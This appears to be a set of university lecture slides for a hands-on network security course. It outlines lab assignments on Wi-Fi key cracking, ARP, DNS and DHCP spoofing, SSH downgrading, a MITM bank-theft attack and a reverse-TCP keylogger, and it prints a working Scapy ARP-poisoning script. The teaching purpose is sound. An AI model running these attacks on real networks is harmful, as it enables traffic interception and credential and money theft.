UNIVERSITY OF JYVÄSKYLÄ

TIES327 – Network Security (3-5 ECTS)

Prof. Timo Hämäläinen timo.t.hamalainen@jyu.fi

Department of Mathematical Information Technology

IT Faculty

University of Jyväskylä

UNIVERSITY OF JYVÄSKYLÄ

Important note!

If you have completed the "old course" TIES326 in year

2012 or 2013, you will not get credits from this

TIES327, as its' content has more than 50% similar

assignments as TIES326 has in 2012 and 2013.

Those students who has completed TIES326 before

2012, has possibility to get credits from TIES327.

UNIVERSITY OF JYVÄSKYLÄ

Goals of the course

Students understand what the term "security" keep

inside in particular in the networks and services point of view

... get familiar with the different security aspects and to understand

the necessary terms

…are cabable to apply the various tools in auditing and protecting

against network attacks

... learn to look for a new knowledge about this area

The feeling of safety can not to be ignorance !

The course focuses on hands-on making of the security issues

and learning by doing different networking security exercises

Remember: Use of the presented methods are illegal in the public

networks !!

UNIVERSITY OF JYVÄSKYLÄ

Prerequisites

• Basic knowledge about networks, TCP/IP- protocols

and programming

• For example courses (or similar knowledge)

• ITKP101- Tietokone ja tietoverkot työvälineenä

• ITKP104 – Tietoverkot

• ITKP102 - Ohjelmointi 1

UNIVERSITY OF JYVÄSKYLÄ

How to complete course ?

• Complete assignments

• Group of 1-3 students

• You should get at least 50% of total points and at least the same 50% of the each

assignments.

• 3 ECTS fulfilment: complete assignments 1-9

• 4 ECTS fulfilment: complete assignments 1-11

• 5 ECTS fulfilment complete all 13 assignments

• Different network attack configurations, tools for protecting and analysing networks

• MITM, WLAN cracking, VPN, Firewall, IDS etc.

• pfSense: http://www.pfsense.org/

• Snort: http://www.snort.org/

• Radamsa: http://code.google.com/p/ouspg/wiki/Radamsa

• Wireshark: http://www.wireshark.org/

• Scapy: http://secdev.org/projects/scapy/

• Kali Linux: http://www.kail.org/

• Exam (not obligatory, upgrading the grade, max. 15points.)

UNIVERSITY OF JYVÄSKYLÄ

About the assignments

1. Virtual network configuration

• In this first assignment, you will create and configure virtual

network which will be used for testing different kinds of network

attack.

• To do this you need an PC with 2 Gb of RAM (bigger is of course

better!).

• We have used Ubuntu, but it is of course possible to make the

same virtual network configuration, if you have Windows or Mac

OS by using corresponding commands.

• https://www.virtualbox.org/

UNIVERSITY OF JYVÄSKYLÄ

UNIVERSITY OF JYVÄSKYLÄ

2: Security in social media/students presentations

(lecture 3)

Group of 1-4 students will make a presentation. The topic is security in

social media (duration of the presentation 20- 25 min).

Presentation should have the following aspects. Even better, if you

can create own live demo like eg. http://www.youtube.com/watch?v=-

H1qjiwQldw:

1. What kind of threats/attacks there exist in social media ?

• Social engineering, phising, Spam, code-injections, XSS,

CSRF/XSRF, DDoS etc.

2. How can you protect against these threats ?

3. Possibilities and drawbacks of Web technologies

• Asynchronous JavaScript And XML (AJAX), Cascading Style

Sheet (CSS), Flash, JSON ja XML etc.

All groups will return www- link (no attachment !) to their presentation

by 9.11 time 23:59 to: timo.t.hamalainen@jyu.fi.

At the beginning of the lecture we will randomly select four groups to

keep their presentations

UNIVERSITY OF JYVÄSKYLÄ

About the assingments

3. WEP Cracking

• In this assignment you are going to crack a WEP key with tools available

at: http://aircrack-ng.org/

• It is intended to build your basic skills and get you familiar with the

wireless network security concepts.

• It assumes you have a working wireless card with drivers already

patched for injection.

• The basic concept behind this work is using aireplay-ng, which will replay

an ARP packet to generate new unique IVs.

• In turn, aircrack-ng uses the new unique IVs to crack the WEP key.

• It is important to understand what an ARP packet is

(http://tools.ietf.org/html/rfc826).

UNIVERSITY OF JYVÄSKYLÄ

4. WPA Cracking

• This assignment walks you through cracking WPA/WPA2 networks which use pre-shared keys.

• We recommend you do some background reading to better understand what WPA/WPA2 is.

• WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can

ONLY crack pre-shared keys.

• So make sure airodump-ng shows the network as having the authentication type of PSK,

otherwise, don't bother trying to crack it.

• There is another important difference between cracking WPA/WPA2 and WEP.

• This is the approach used to crack the WPA/WPA2 pre-shared key.

• Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain

brute force techniques can be used against WPA/WPA2.

• That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does

not speed up the attack.

• The only thing that does give the information to start an attack is the handshake between client

and AP.

• Handshaking is done when the client connects to the network.

• Although not absolutely true, for the purposes of this assignment, consider it true.

• Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes

impossible to crack the pre-shared key.

• The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in

length.

UNIVERSITY OF JYVÄSKYLÄ

5. ARP Poisoning

• In this assignment you are going to perform two Man-In-The-Middle (MITM)

attacks: poisoning ARP tables and redirecting ICMP traffic

• ARP poisoning is also known as ARP Spoofing, ARP Flooding and ARP

Poisoning Routing.

• So what basically is ARP poisoning ?

• It is technique which allows an attacker sniffs traffic from LAN, monitors it

and even stop it.

• ARP poisoning is done by sending fake or spoofed messages to an

Ethernet LAN card.

• By doing so an attacker manages to associate its MAC address with IP

address of another node on network

(which is basically default gateway IP).

• Then the traffic meant for gateway first goes to attacker and then to

gateway thus allowing attacker to sniff traffic from network.

UNIVERSITY OF JYVÄSKYLÄ

5. ICMP Redirection

• ICMP (Internet Control Message Protocol) is used to send error messages,

report problems and for routing purposes.

• When the router sends to the client for route redirection and indicates a

shorter route to some particular destination, a host-route entry is added to

the clients routing table.

• The attacker can change the clients routing table so as traffic from the client

to a web server will be redirected to the attacker.

• For this purpose the attacker sends ICMP redirect message to the client, in

which source IP is the gateway, source IP for redirection is the client,

destination IP for redirection is the web server and gateway is the attacker.

• After the client updates its routing table with the web servers IP address

and the attackers IP address, all traffic from the client to the web server is

redirected to the attacker.

UNIVERSITY OF JYVÄSKYLÄ

6. DNS spoofing

• In this exercise you are going to perform two Man-In-The-Middle (MITM) attacks: spoofing DNS

and DHCP servers.

• The Domain Name System translates names that human can understand to IP addresses.

• First, the client sends DNS query and the DNS server responds with DNS response.

• The DNS query and response have identical ID number and query.

• Then the client updates its DNS cache entries accordingly domain name and IP address.

• Assume that the attacker wants to change the clients DNS cache so that traffic from client to the

domain web.seclab,jyu.fi. will be redirected to the attackers server 192.168.1.102.

• For this purpose the attacker snifs DNS queries from the client and waits for DNS query with the

relevant query, then the attacker spoofs a DNS response e.g. with the attacker's IP.

• Client updates its DNS cache and therefore all traffic goes to the attacker. Attacker repeats to spoof

DNS responses to maintain a valid cache.

• However DNS query eventually arrives the DNS server and the server will respond with a legitimate

DNS response.

• When the client gets the legitimate response, it will update its cache.

• For this reason, ARP poisoning of the client should be done before DNS spoofing. In this section,

we show how to spoof the DNS server.

UNIVERSITY OF JYVÄSKYLÄ

6. DHCP spoofing

• The DHCP (Dynamic Host Configuration Protocol) is used to configure

network settings to hosts on IP networks.

• DHCP allows hosts to be dynamically configured with IP address, subnet

mask, gateway address and DNS server address.

• It works as follows: first, the client sends (broadcasts) DHCP discover

containing transaction ID.

• The DHCP server responds with DHCP offer which contains the same

transaction ID.

• The client then sends DHCP request and the DHCP server responds with

DHCP Ack.

• When the attacker applying DHCP spoofing attack an attacker waits for

DHCP discover request from the client.

UNIVERSITY OF JYVÄSKYLÄ

6. DHCP spoofing

• After getting this request the attacker spoofs a DHCP offer with assigning

malicious gateway or/and DNS server.

• After that the client responds with DHCP request and the attacker spoofs a

DHCP Ack as well.

• Finally, the client updates its DNS server and gateway addresses.

• However, when DHCP discover arrives the DHCP server this server

responds to the client with a legitimate DHCP offer.

• If the client gets the legitimate offer first then DHCP spoofing will not work.

• For this reason, the attacker DoS the DHCP server during the attack so as

DHCP server can not respond to clients.

• In this section, we show how to spoof the DHCP server.

UNIVERSITY OF JYVÄSKYLÄ

7. Annoying HTTP server and bank attack

• This assignment explains deals with two Man-In-The-Middle (MITM)

attacks: annoying HTTP server and bank attack.

• Once an attacker has been located in the middle between his victim and

other network nodes, he can easily change HTTP requests and responses

which go through him.

• In this section, the attacker changes web pages which the victim requested

from a web site to make the victim feel nervous.

• For this attack, the attacker first poisons the ARP cache of the victim in

order to be "in the middle".

• Then when the victim requests a web page he modifies all pictures

contained on the page and sends the result to the victim.

Bank attack

• In this section, we use the case when the attacker places himself "in the

middle" and then steals money from the victim's bank account, when the

victim logs in to the system.

• Despite the fact that cryptographic protocol SSL is used by the bank web

site, the attacker is still able to make transfer of the victim's money to

another bank account.

UNIVERSITY OF JYVÄSKYLÄ

8. SSH downgrading

• Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote

shell services or command execution and other secure network services between two networked

computers that it connects via a secure channel over an insecure network.

• The protocol specification distinguishes two major versions that are referred to as SSH-1 and

SSH-2.

• Here we consider the most famous example of a downgrade attack where the attacker forces the

client and the server to use the insecure SSH-1 protocol.

• The client sends a request to establish a SSH link to the server and asks it for the version it

supports. The server answers either with:

- ssh-2.xx, i.e. the server supports only SSH-2,

- ssh-1.99, i.e. the server supports SSH-1 and SSH-2,

- ssh-1.51, i.e. the server supports only SSH-1.

• In our example, the server is configured to support both SSH-1 and SSH-2 and the client is set

to use SSH-2 and SSH-1 but SSH-2 as a preference.

• In this case the hacker if he already is located in the middle (e.g. after applying ARP poisoning)

will change the answer by modifying the "1.99" string to "1.51" to indicate to the client that the

server supports only SSH-1 and thus forces the client to open a SSH-1 link.

• The client who thinks to use the secure SSH-2 protocol will login with SSH-1 and the password

will be immediately captured by the hacker because of the SSH-1 weak password authentication

mechanism.

UNIVERSITY OF JYVÄSKYLÄ

9. Reverse TCP attack

• Man-In-The-Middle attacks can be combined with such dangerous attacks

as reverse TCP connection.

• A firewall usually blocks open ports, but does not block outgoing traffic,

therefore a reverse connection is used to bypass firewall and router security

restrictions.

• For example, a Trojan horse running on a computer behind a firewall that

blocks incoming connections can easily open an outbound connection to a

remote host on the Internet.

• Once the connection is established, the remote host can send commands to

the Trojan horse.

• Trojan horses that use a reverse connection usually send SYN (TCP)

packets to the attacker's IP address.

• The attacker listens for these SYN packets and accepts the desired

connections.

UNIVERSITY OF JYVÄSKYLÄ

10. Configuring VPN connection with the help of

OpenVPN

• This assignment is used to configure OpenVPN server and client, set up

your own Certificate Authority (CA), generate keys and sign certificates.

• In addition, it describes dual-factor authentication based on username and

password, which are used by the server for authenticating a connecting

client.

• OpenVPN is a full-featured SSL VPN which implements secure network

extension using the industry standard SSL/TLS protocol, supports exible

client authentication methods based on certicates, smart cards, and/or

username/password credentials, and allows user or group-specific access

control policies using firewall rules applied to the VPN virtual interface.

UNIVERSITY OF JYVÄSKYLÄ

11. Public-key cryptography with GNU Privacy Guard

• Public-key cryptography allows you to communicate with someone securely without exchanging a

secret password first. With public-key encryption, instead of sharing a password, each party

generates a "keypair“ consisting of a "public" key and a "secret/private" key.

• Each party can then publish their "public" key to the world or send it directly to the other party,

while keeping their secret key private and safe. If you have Person's public key, you can do a few

things with it:

• Encrypt a message that only that Person can decrypt (they need their secret key to decrypt

it).

• Validate that Person signed a message with their secret key. This also lets you verify

strongly that the message was not corrupted nor modified in transmission.

• With your secret key, you can do following things:

• Decrypt messages encrypted with your public key.

• Sign messages that others can verify came from you (they need your public key to verify the

signature).

• This assignment explains how to configure and use Public Key Infrastructure (PKI), encrypt les

and sign emails by using GNU Privacy Guard (GPG).

• The GNU privacy guard is the GNU project's complete and free implementation of the OpenPGP

standard as defined by RFC4880. GPG allows to encrypt and sign your data and communication,

features a versatile key management system as well as access modules for all kinds of public key

directories

UNIVERSITY OF JYVÄSKYLÄ

12. Configuration of Snort and pfSense

• In this assignment you are going to install, configure and tune Snort and

pfSense for protecting your network.

• Snort is a free and open source network intrusion prevention system and

network intrusion detection system (signature based)

• pfSense is an open source firewall/router computer software distribution

based on FreeBSD.

UNIVERSITY OF JYVÄSKYLÄ

13. Network traffic anomaly detection

• In this assignment, HTTP access log file is preprocessed into a numerical

matrix, anomalous queries are found using dimensionality reduction and

clustering, and finally anomalous log lines are analyzed.

• In this exercise, it is assumed that some kind of Linux distribution is used

(running in virtualbox etc. is ne)

• Windows installation might be possible, but it is much easier on Linux.

• In the following examples, Octave software is used

• In addition, we need the package octave-statistics.

• If available, Matlab uses the same syntax.

• Python is also used, because the character distribution file will be generated

with it from the Apache log file.

UNIVERSITY OF JYVÄSKYLÄ

Tools used in assignments

Kali Linux http://www.kali.org/

From the creators of BackTrack comes Kali Linux, the most

advanced and versatile penetration testing distribution ever created.

BackTrack has grown far beyond its humble roots as a live CD and

has now become a full-fledged operating system

UNIVERSITY OF JYVÄSKYLÄ

Some tools used in assignments

Python https://www.python.org/

Scapy http://secdev.org/projects/scapy/

Scapy is a powerful interactive packet manipulation program. It is able to

forge or decode packets of a wide number of protocols, send them on the

wire, capture them, match requests and replies, and much more.

It can easily handle most classical tasks like scanning, tracerouting,

probing, unit tests, attacks or network discovery (it can replace hping, 85%

of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.).

It also performs very well at a lot of other specific tasks that most other tools

can't handle, like sending invalid frames, injecting your own 802.11 frames,

combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding

on WEP encrypted channel, ...), etc.

UNIVERSITY OF JYVÄSKYLÄ

Tools used in assignments

Python scripts

ARP poisoning

ICMP Redirection

DNS spoofing

DHCP spoofing

Annoying HTTP server

Bank attack

SSH downgrading

Other files

Login database for the bank server

Certificate file for the bank server

Bank server

Keylogger for the Ubuntu reverse tcp attack

Keylog reader for the Ubuntu reverse tcp attack

UNIVERSITY OF JYVÄSKYLÄ

An example: ARP poisoning (Python)

from scapy.all import *

from time import sleep

import threading

import os, sys

class SpoofThread (threading.Thread):

def __init__(self, victim, gateway):

self.packet = ARP()

self.packet.psrc = gateway

self.packet.pdst = victim

threading.Thread.__init__(self)

def run (self):

counter = 0

print "spoofing " + str(self.packet.pdst) + " every 5 seconds..."

try:

while 1:

send(self.packet, verbose=0);

counter += 1

print 'poison #' + str(counter)

sleep(5);

except Exception as e:

print type(e)

print e.args

print e

pass

if __name__ == '__main__':

if len(sys.argv) != 3:

sys.exit('Usage: %s <victim(s) IP(s)> <spoofed source IP> \n example: python ArpSpoofing.py 192.168.72.128

192.168.72.2' % os.path.basename(__file__))

targets_dest_ips = [sys.argv[1]]

spoofed_src_ip = sys.argv[2]

for ip in targets_dest_ips:

SpoofThread(ip, spoofed_src_ip).start()

UNIVERSITY OF JYVÄSKYLÄ

Course grading

Total points Grade

55 5

50 4

45 3

40 2

30 1

Work load

Ca. 150 hours, consisting of lectures ca. 20 hours,

assignments x hours, of course depending on your

background skills.

UNIVERSITY OF JYVÄSKYLÄ

About the lectures

The lectures are intended to provide introduction to various

networking security topics and examples

The course focuses on hands-on making of the security issues and

learning by doing (not learning by listening !).

Some literature:

• Lot of research papers

• - IEEE Explore, http://ieeexplore.ieee.org/Xplore/dynhome.jsp

- ACM, http://portal.acm.org/dl.cfm

- Google scholar, http://scholar.google.com/

– http://site.ebrary.com/lib/jyvaskyla

• Introduction to Network Security

• Hacking Exposed Web 2.0 : Web 2.0 Security Secrets and

Solutions

• CEH : Certified Ethical Hacker Study Guide

UNIVERSITY OF JYVÄSKYLÄ

L1: Introduction to the network security

What is security and what are the goals

Threats of networks and IT- systems

Security policies

Risk calculation

Security offenses

Social Engineering

Phishing

Legislation

UNIVERSITY OF JYVÄSKYLÄ

L2: Recent networking security threats/malwares

(visiting lecture by Matti Kannela)

Trojan horses

Rootkits

Spyware Worms

Viruses

Adware

Backdoors

Ransomware

Etc.

UNIVERSITY OF JYVÄSKYLÄ

L3 : Security in social media (students presentations)

Assignment no. 2

Group of 1-4 students will make a presentation. The topic is security in

social media (duration of the presentation 20- 25 min).

Presentation should have the following aspects. Even better, if you

can create own live demo like eg. http://www.youtube.com/watch?v=-

H1qjiwQldw:

1. What kind of threats/attacks there exist in social media ?

• Social engineering, phising, Spam, code-injections, XSS,

CSRF/XSRF, DDoS etc.

2. How can you protect against these threats ?

3. Possibilities and drawbacks of Web technologies

• Asynchronous JavaScript And XML (AJAX), Cascading Style

Sheet (CSS), Flash, JSON ja XML etc.

All groups will return www- link (no attachment !) to their presentation

by 9.11 time 23:59 to: timo.t.hamalainen@jyu.fi.

At the beginning of the lecture we will randomly select four groups to

keep their presentations

UNIVERSITY OF JYVÄSKYLÄ

L4: Security for 4G Cellular Networks

(visiting lecture by Zheng Chang)

Cellural networks security issues (PHY/MAC layers)

SECURITY THREATS

User Identity

Femtocells

Interoperability

RRC signalling

Other threats

Being an all-IP networks makes the system vulnerable

against IP attacks, such Deny of Service (DoS) over the

public IP addresses of the core network interfaces, traffic

eavesdropping and injection attacks.

UNIVERSITY OF JYVÄSKYLÄ

L5: Modelling attacks (visiting lecture by

Simo Huopio, Finnish defence forces)

Modelling and analysing attacks against network and

services

DDoS (Distributed Denial of Service)

Zero-Day attacks

APT (Advanced Persistent Threat)

Fuzzing/testing programs vulnerabilities

UNIVERSITY OF JYVÄSKYLÄ

L6: Protecting your networked services (visiting lecture

by Tapio Väärämäki, Exclusive Networks Finland)

CARM – Cyber Attack Remediation and Mitigation

UTM (Unified Threat Management)

NGFW (Next Generation Firewall)

WAF (Web Application Firewall)

Database Security

File Security

Endpoint Security

UNIVERSITY OF JYVÄSKYLÄ

L7: Monitoring and analysing the nework

data

Normal netwok behaviour

Anomality detection

How to gather data

Pre-processing and analysing the data

UNIVERSITY OF JYVÄSKYLÄ

Some links

http://www.cert.fi/

http://www.vm.fi/tietoturvallisuus

http://www.digitoday.fi/tietoturva

http://www.securityfocus.com

http://www.secureworks.com/cyber-threat-

intelligence/advanced-threat-services/